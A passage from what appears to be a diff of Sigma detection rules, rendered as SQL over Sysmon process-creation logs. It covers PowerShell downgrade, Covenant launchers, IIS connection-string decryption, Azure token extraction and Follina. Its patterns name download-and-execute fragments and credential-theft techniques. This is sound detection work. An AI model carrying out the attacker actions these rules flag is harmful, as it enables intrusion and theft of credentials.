https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "status": "test", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - 
"title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": "experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects 
successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. 
This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", + "tags": [ + "attack.execution", + "attack.t1059.001" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", - "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. 
This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "status": "experimental", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - 
"description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": 
"c09dad97-1c78-4f71-b127-7edb2b8e491a", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 
'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter 
(as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. 
Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "status": "experimental", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that 
invokes inline VBScript as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "status": "test", + "description": "Detects suspicious Splwow64.exe process without any command line 
parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "status": "experimental", + "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE 